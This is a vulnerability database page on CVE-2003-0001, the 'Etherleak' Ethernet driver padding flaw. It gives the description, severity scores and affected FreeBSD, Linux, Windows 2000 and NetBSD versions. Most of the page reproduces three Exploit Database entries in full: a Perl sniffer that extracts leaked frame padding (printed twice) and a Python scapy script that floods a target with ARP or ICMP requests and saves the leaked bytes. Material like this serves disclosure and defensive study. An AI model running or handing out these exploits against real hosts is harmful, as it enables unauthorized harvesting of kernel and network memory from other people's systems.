CVE-2003-0001 : Detail

CVE-2003-0001

A01-Broken Access Control
25.72%V3
Network
2003-01-08
04h00 +00:00
2018-10-19
12h57 +00:00
CVE.org
NVD
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Multiple ethernet Network Interface Card (NIC) device drivers do not pad frames with null bytes, which allows remote attackers to obtain information from previous packets or kernel memory by using malformed packets, as demonstrated by Etherleak.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-200 Exposure of Sensitive Information to an Unauthorized Actor
The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information.

Metrics

Metrics Score Severity CVSS Vector Source
V2 5 AV:N/AC:L/Au:N/C:P/I:N/A:N [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
EPSS First.org

Exploit information

Exploit Database EDB-ID : 22131

Publication date : 2007-03-22 23h00 +00:00
Author : Jon Hart
EDB Verified : Yes

source: https://www.securityfocus.com/bid/6535/info Network device drivers for several vendors have been reported to disclose potentially sensitive information to attackers. Frames that are smaller than the minimum frame size should have the unused portion of the frame buffer padded with null (or other) bytes. Some device drivers fail to do this adequately, leaving the data that was stored in the memory comprising the buffer prior to its use intact. Consequently, this data may be transmitted within frames across Ethernet segments. Since the Ethernet frame buffer is allocated in kernel memory space, sensitive data may be leaked. Cisco has stated that the IOS 12.1 and 12.2 trains are not affected. National Semiconductor Ethernet controller chips are not vulnerable to this issue. #!/usr/bin/perl -w # etherleak, code that has been 5 years coming. # # On 04/27/2002, I disclosed on the Linux Kernel Mailing list, # a vulnerability that would be come known as the 'etherleak' bug. In # various situations an ethernet frame must be padded to reach a specific # size or fall on a certain boundary. This task is left up to the driver # for the ethernet device. The RFCs state that this padding must consist # of NULLs. The bug is that at the time and still to this day, many device # drivers do not pad will NULLs, but rather pad with unsanitized portions # of kernel memory, oftentimes exposing sensitive information to remote # systems or those savvy enough to coerce their targets to do so. # # Proof of this can be found by googling for 'warchild and etherleak', or # by visiting: # # http://lkml.org/lkml/2002/4/27/101 # # This was ultimately fixed in the Linux kernel, but over time this # vulnerability reared its head numerous times, but at the core the # vulnerability was the same as the one I originally published. The most # public of these was CVE-2003-0001, which was assigned to address an # official @stake advisory. # # This code can be found its most current form at: # # http://spoofed.org/files/exploits/etherleak # # Jon Hart <[email protected]>, March 2007 # use strict; use diagnostics; use warnings; use Getopt::Long; use Net::Pcap; use NetPacket::Ethernet qw(:ALL); use NetPacket::IP qw(:ALL); my %opts = (); my ($iface, $err, $pcap_t, $pcap_save, $filter_string); GetOptions( \%opts, 'help', 'filter=s', 'interface=s', 'quiet', 'read=s', 'write=s', 'verbose') or die "Unknown option: $!\n" && &usage(); if (defined($opts{'help'})) { &usage(); exit(0); } if (defined($opts{'read'})) { $pcap_t = Net::Pcap::open_offline($opts{'read'}, \$err); if (!defined($pcap_t)) { print("Net::Pcap::open_offline failed: $err\n"); exit 1; } } else { if (defined($opts{'interface'})) { $iface = $opts{'interface'}; } else { $iface = Net::Pcap::lookupdev(\$err); if (defined($err)) { print(STDERR "lookupdev() failed: $err\n"); exit(1); } else { print(STDERR "No interface specified. Using $iface\n"); } } $pcap_t = Net::Pcap::open_live($iface, 65535, 1, 0, \$err); if (!defined($pcap_t)) { print("Net::Pcap::open_live failed on $iface: $err\n"); exit 1; } } my $filter; if (Net::Pcap::compile($pcap_t, \$filter, defined($opts{'filter'}) ? $opts{'filter'} : "", 0, 0) == -1) { printf("Net::Pcap::compile failed: %s\n", Net::Pcap::geterr($pcap_t)); exit(1); } if (Net::Pcap::setfilter($pcap_t, $filter) == -1) { printf("Net::Pcap::setfilter failed: %s\n", Net::Pcap::geterr($pcap_t)); exit(1); } if (defined($opts{'write'})) { $pcap_save = Net::Pcap::dump_open($pcap_t, $opts{'write'}); if (!defined($pcap_save)) { printf("Net::Pcap::dump_open failed: %s\n", Net::Pcap::geterr($pcap_t)); exit(1); } } Net::Pcap::loop($pcap_t, -1, \&process, "foo"); Net::Pcap::close($pcap_t); if (defined($opts{'write'})) { Net::Pcap::dump_close($pcap_save); } sub process { my ($user, $hdr, $pkt) = @_; my ($link, $ip); my $jump = 0; my $datalink = Net::Pcap::datalink($pcap_t); if ($datalink == 1) { $jump += 14; } elsif ($datalink == 113) { $jump += 16; } else { printf("Skipping datalink $datalink\n"); return; } my $l2 = NetPacket::Ethernet->decode($pkt); if ($l2->{type} == ETH_TYPE_IP) { $ip = NetPacket::IP->decode(eth_strip($pkt)); $jump += $ip->{len}; } elsif ($l2->{type} == ETH_TYPE_ARP) { $jump += 28; } else { # assume 802.3 ethernet, and just jump ahead the length for ($l2->{dest_mac}) { if (/^0180c200/) { # spanning tree # l2->{type} here will actually be the length. HACK. $jump += $l2->{type}; } elsif (/^01000ccccc/) { # CDP/VTP/DTP/PAgP/UDLD/PVST, etc # l2->{type} here will actually be the length. HACK. $jump += $l2->{type}; } elsif (/^ab0000020000/) { # DEC-MOP-Remote-Console return; } else { # loopback if ($l2->{src_mac} eq $l2->{dest_mac}) { return; } printf("Skipping datalink $datalink l2 type %s\n", $l2->{type}); return; } } } if ($hdr->{len} > $jump) { my $trailer_bin = substr($pkt, $jump); my $trailer_hex = ""; my $trailer_ascii = ""; foreach (split(//, $trailer_bin)) { $trailer_hex .= sprintf("%02x", ord($_)); if (ord($_) >= 32 && ord($_) <= 126) { $trailer_ascii .= $_; } else { $trailer_ascii .= "."; } } # ignore all trailers that are just single characters repeated. # most OS' use 0, F, 5 or a. unless ($trailer_hex =~ /^(0|5|f|a)\1*$/i) { unless ($opts{'quiet'}) { print("#"x80, "\n"); printf("%s -> %s\n", $l2->{src_mac}, $l2->{dest_mac}); if ($l2->{type} == ETH_TYPE_IP) { printf("%s -> %s\n", $ip->{src_ip}, $ip->{dest_ip}); } } print("$trailer_hex\t$trailer_ascii\n"); if (defined($opts{'write'})) { Net::Pcap::dump($pcap_save, $hdr, $pkt); } } } } sub usage { print <<EOF; $0 -- A demonstration of the infamous 'etherleak' bug. CVE-2003-0001, and countless repeats of the same vulnerability. Options: [-h|--help] # this message [-i|--interface] <interface> # interface to listen on [-f|--filter] <pcap filter> # apply this filter to the traffic [-r|--read] <path to pcap> # read from this saved pcap file [-w|--write] <path to pcap> # write tothis saved pcap file [-q|--quiet] # be quiet [-v|--verbose] # be verbose EOF } # milw0rm.com [2007-03-23]
Exploit Database EDB-ID : 26076

Publication date : 2013-06-09 22h00 +00:00
Author : prdelka
EDB Verified : No

#!/usr/bin/env python # CVE-2003-0001 'Etherleak' exploit # ================================= # Exploit for hosts which use a network device driver that pads # ethernet frames with data which vary from one packet to another, # likely taken from kernel memory, system memory allocated to # the device driver, or a hardware buffer on its network interface # card. Exploit uses scapy with either ICMP or ARP requests as # this can trigger with either but ICMP can hit layer3 filtering # rules. Using ARP the padding appears to leak only fixed constant # values when exploited, ICMP leaks random bytes. # # root@bt:~/0d# python cve-2003-0001.py x.x.x.254 icmp leaky # WARNING: No route found for IPv6 destination :: (no default route?) # [ CVE-2003-0001 'Etherleak' exploit # [ Attacking x.x.x.254 for icmp padding saved to leaky.hex # ............................................................^C!Killing # !Killing # root@bt:~/0d# hexdump -C leaky | head # 00000000 e6 bd a6 9b 90 eb 44 f5 18 a5 29 2a 16 5a 08 ff |......D...)*.Z..| # 00000010 43 e1 23 07 8f 96 5a 24 3f 3d 33 7d b4 97 7e 18 |C.#...Z$?=3}..~.| # 00000020 05 c9 7c 2c a5 c0 fa 7a 76 f3 51 c0 fe 07 72 32 |..|,...zv.Q...r2| # 00000030 9e ad 6a 67 ad 43 58 17 60 43 bc 2b b8 fb cc 70 |..jg.CX.`C.+...p| # 00000040 99 92 80 84 03 03 6f 8f 18 d3 5b 5e f0 1e 3a 83 |......o...[^..:.| # 00000050 3d 82 e7 cd 3e 1f 31 74 b0 06 8c a2 7e 14 6b fb |=...>.1t....~.k.| # 00000060 72 9b ac 64 74 9b a4 d9 23 5b 92 82 0d 0b 31 f0 |r..dt...#[....1.| # 00000070 a9 4f dd 3f bf 2b 5c 67 6c 22 fa da d0 2b d6 39 |.O.?.+\gl"...+.9| # 00000080 40 58 13 4f 3d bb 48 03 d3 53 3c 5c 44 d2 3d b2 |@X.O=.H..S<\D.=.| # 00000090 4f f2 a9 4a 02 80 4e 1b 6c bd 69 89 bd 76 1b 0a |O..J..N.l.i..v..| # # This issue has been resolved in ASA 8.4.4.6/8.2.5.32. Cisco Bug reference # is CSCua88376 and PSIRT-0669464365. # # -- prdelka # import os import sys import signal import binascii from scapy.all import * def signalhandler(signal,id): print "!Killing" sys.exit(0) def spawn(host,type): if type == 'arp': send(ARP(pdst=host),loop=1,nofilter=1) elif type == 'icmp': send(IP(dst=host)/ICMP(type=8)/'x',loop=1,nofilter=1) if __name__ == "__main__": print "[ CVE-2003-0001 'Etherleak' exploit" signal.signal(signal.SIGINT,signalhandler) if len(sys.argv) < 4: print "[ No! Use with <host> <arp|icmp> <file>" sys.exit(1) type = sys.argv[2] if type == 'arp': pass elif type == 'icmp': pass else: print "Bad type!" sys.exit(0) pid = os.fork() if(pid): print "[ Attacking %s for %s padding saved to %s.hex" % (sys.argv[1],sys.argv[2],sys.argv[3]) spawn(sys.argv[1],sys.argv[2]) while True: if type == 'arp': myfilter = "host %s and arp" % sys.argv[1] elif type == 'icmp': myfilter = "host %s and icmp" % sys.argv[1] x = sniff(count=1,filter=myfilter,lfilter=lambda x: x.haslayer(Padding)) p = x[0] if type == 'arp': pad = p.getlayer(2) if type == 'icmp': pad = p.getlayer(4) leak = str(pad) hexfull = binascii.b2a_hex(leak) file = "%s.hex"%sys.argv[3] fdesc = open(file,"a") fdesc.write(hexfull + "\n") fdesc.close() # 32 bits leaked here for me. if type == 'icmp': bytes = leak[9:13] elif type == 'arp': bytes = leak[10:14] fdesc = open(sys.argv[3],"ab") fdesc.write(bytes) fdesc.close()
Exploit Database EDB-ID : 3555

Publication date : 2007-03-22 23h00 +00:00
Author : Jon Hart
EDB Verified : Yes

#!/usr/bin/perl -w # etherleak, code that has been 5 years coming. # # On 04/27/2002, I disclosed on the Linux Kernel Mailing list, # a vulnerability that would be come known as the 'etherleak' bug. In # various situations an ethernet frame must be padded to reach a specific # size or fall on a certain boundary. This task is left up to the driver # for the ethernet device. The RFCs state that this padding must consist # of NULLs. The bug is that at the time and still to this day, many device # drivers do not pad will NULLs, but rather pad with unsanitized portions # of kernel memory, oftentimes exposing sensitive information to remote # systems or those savvy enough to coerce their targets to do so. # # Proof of this can be found by googling for 'warchild and etherleak', or # by visiting: # # http://lkml.org/lkml/2002/4/27/101 # # This was ultimately fixed in the Linux kernel, but over time this # vulnerability reared its head numerous times, but at the core the # vulnerability was the same as the one I originally published. The most # public of these was CVE-2003-0001, which was assigned to address an # official @stake advisory. # # This code can be found its most current form at: # # http://spoofed.org/files/exploits/etherleak # # Jon Hart <[email protected]>, March 2007 # use strict; use diagnostics; use warnings; use Getopt::Long; use Net::Pcap; use NetPacket::Ethernet qw(:ALL); use NetPacket::IP qw(:ALL); my %opts = (); my ($iface, $err, $pcap_t, $pcap_save, $filter_string); GetOptions( \%opts, 'help', 'filter=s', 'interface=s', 'quiet', 'read=s', 'write=s', 'verbose') or die "Unknown option: $!\n" && &usage(); if (defined($opts{'help'})) { &usage(); exit(0); } if (defined($opts{'read'})) { $pcap_t = Net::Pcap::open_offline($opts{'read'}, \$err); if (!defined($pcap_t)) { print("Net::Pcap::open_offline failed: $err\n"); exit 1; } } else { if (defined($opts{'interface'})) { $iface = $opts{'interface'}; } else { $iface = Net::Pcap::lookupdev(\$err); if (defined($err)) { print(STDERR "lookupdev() failed: $err\n"); exit(1); } else { print(STDERR "No interface specified. Using $iface\n"); } } $pcap_t = Net::Pcap::open_live($iface, 65535, 1, 0, \$err); if (!defined($pcap_t)) { print("Net::Pcap::open_live failed on $iface: $err\n"); exit 1; } } my $filter; if (Net::Pcap::compile($pcap_t, \$filter, defined($opts{'filter'}) ? $opts{'filter'} : "", 0, 0) == -1) { printf("Net::Pcap::compile failed: %s\n", Net::Pcap::geterr($pcap_t)); exit(1); } if (Net::Pcap::setfilter($pcap_t, $filter) == -1) { printf("Net::Pcap::setfilter failed: %s\n", Net::Pcap::geterr($pcap_t)); exit(1); } if (defined($opts{'write'})) { $pcap_save = Net::Pcap::dump_open($pcap_t, $opts{'write'}); if (!defined($pcap_save)) { printf("Net::Pcap::dump_open failed: %s\n", Net::Pcap::geterr($pcap_t)); exit(1); } } Net::Pcap::loop($pcap_t, -1, \&process, "foo"); Net::Pcap::close($pcap_t); if (defined($opts{'write'})) { Net::Pcap::dump_close($pcap_save); } sub process { my ($user, $hdr, $pkt) = @_; my ($link, $ip); my $jump = 0; my $datalink = Net::Pcap::datalink($pcap_t); if ($datalink == 1) { $jump += 14; } elsif ($datalink == 113) { $jump += 16; } else { printf("Skipping datalink $datalink\n"); return; } my $l2 = NetPacket::Ethernet->decode($pkt); if ($l2->{type} == ETH_TYPE_IP) { $ip = NetPacket::IP->decode(eth_strip($pkt)); $jump += $ip->{len}; } elsif ($l2->{type} == ETH_TYPE_ARP) { $jump += 28; } else { # assume 802.3 ethernet, and just jump ahead the length for ($l2->{dest_mac}) { if (/^0180c200/) { # spanning tree # l2->{type} here will actually be the length. HACK. $jump += $l2->{type}; } elsif (/^01000ccccc/) { # CDP/VTP/DTP/PAgP/UDLD/PVST, etc # l2->{type} here will actually be the length. HACK. $jump += $l2->{type}; } elsif (/^ab0000020000/) { # DEC-MOP-Remote-Console return; } else { # loopback if ($l2->{src_mac} eq $l2->{dest_mac}) { return; } printf("Skipping datalink $datalink l2 type %s\n", $l2->{type}); return; } } } if ($hdr->{len} > $jump) { my $trailer_bin = substr($pkt, $jump); my $trailer_hex = ""; my $trailer_ascii = ""; foreach (split(//, $trailer_bin)) { $trailer_hex .= sprintf("%02x", ord($_)); if (ord($_) >= 32 && ord($_) <= 126) { $trailer_ascii .= $_; } else { $trailer_ascii .= "."; } } # ignore all trailers that are just single characters repeated. # most OS' use 0, F, 5 or a. unless ($trailer_hex =~ /^(0|5|f|a)\1*$/i) { unless ($opts{'quiet'}) { print("#"x80, "\n"); printf("%s -> %s\n", $l2->{src_mac}, $l2->{dest_mac}); if ($l2->{type} == ETH_TYPE_IP) { printf("%s -> %s\n", $ip->{src_ip}, $ip->{dest_ip}); } } print("$trailer_hex\t$trailer_ascii\n"); if (defined($opts{'write'})) { Net::Pcap::dump($pcap_save, $hdr, $pkt); } } } } sub usage { print <<EOF; $0 -- A demonstration of the infamous 'etherleak' bug. CVE-2003-0001, and countless repeats of the same vulnerability. Options: [-h|--help] # this message [-i|--interface] <interface> # interface to listen on [-f|--filter] <pcap filter> # apply this filter to the traffic [-r|--read] <path to pcap> # read from this saved pcap file [-w|--write] <path to pcap> # write tothis saved pcap file [-q|--quiet] # be quiet [-v|--verbose] # be verbose EOF } # milw0rm.com [2007-03-23]

Products Mentioned

Configuraton 0

Freebsd>>Freebsd >> Version 4.2

Freebsd>>Freebsd >> Version 4.3

Freebsd>>Freebsd >> Version 4.4

Freebsd>>Freebsd >> Version 4.5

Freebsd>>Freebsd >> Version 4.6

Freebsd>>Freebsd >> Version 4.7

Linux>>Linux_kernel >> Version 2.4.1

Linux>>Linux_kernel >> Version 2.4.2

Linux>>Linux_kernel >> Version 2.4.3

Linux>>Linux_kernel >> Version 2.4.4

Linux>>Linux_kernel >> Version 2.4.5

Linux>>Linux_kernel >> Version 2.4.6

Linux>>Linux_kernel >> Version 2.4.7

Linux>>Linux_kernel >> Version 2.4.8

Linux>>Linux_kernel >> Version 2.4.9

Linux>>Linux_kernel >> Version 2.4.10

Linux>>Linux_kernel >> Version 2.4.11

Linux>>Linux_kernel >> Version 2.4.12

Linux>>Linux_kernel >> Version 2.4.13

Linux>>Linux_kernel >> Version 2.4.14

Linux>>Linux_kernel >> Version 2.4.15

Linux>>Linux_kernel >> Version 2.4.16

Linux>>Linux_kernel >> Version 2.4.17

Linux>>Linux_kernel >> Version 2.4.18

Linux>>Linux_kernel >> Version 2.4.19

Linux>>Linux_kernel >> Version 2.4.20

Microsoft>>Windows_2000 >> Version *

Microsoft>>Windows_2000 >> Version *

Microsoft>>Windows_2000 >> Version *

Microsoft>>Windows_2000_terminal_services >> Version *

Microsoft>>Windows_2000_terminal_services >> Version *

Microsoft>>Windows_2000_terminal_services >> Version *

Netbsd>>Netbsd >> Version 1.5

Netbsd>>Netbsd >> Version 1.5.1

Netbsd>>Netbsd >> Version 1.5.2

Netbsd>>Netbsd >> Version 1.5.3

Netbsd>>Netbsd >> Version 1.6

References

http://www.securitytracker.com/id/1031583
Tags : vdb-entry, x_refsource_SECTRACK
http://www.osvdb.org/9962
Tags : vdb-entry, x_refsource_OSVDB
http://www.redhat.com/support/errata/RHSA-2003-088.html
Tags : vendor-advisory, x_refsource_REDHAT
http://marc.info/?l=bugtraq&m=104222046632243&w=2
Tags : mailing-list, x_refsource_BUGTRAQ
http://www.kb.cert.org/vuls/id/412115
Tags : third-party-advisory, x_refsource_CERT-VN
http://www.redhat.com/support/errata/RHSA-2003-025.html
Tags : vendor-advisory, x_refsource_REDHAT
http://secunia.com/advisories/7996
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.atstake.com/research/advisories/2003/a010603-1.txt
Tags : vendor-advisory, x_refsource_ATSTAKE
http://www.securitytracker.com/id/1040185
Tags : vdb-entry, x_refsource_SECTRACK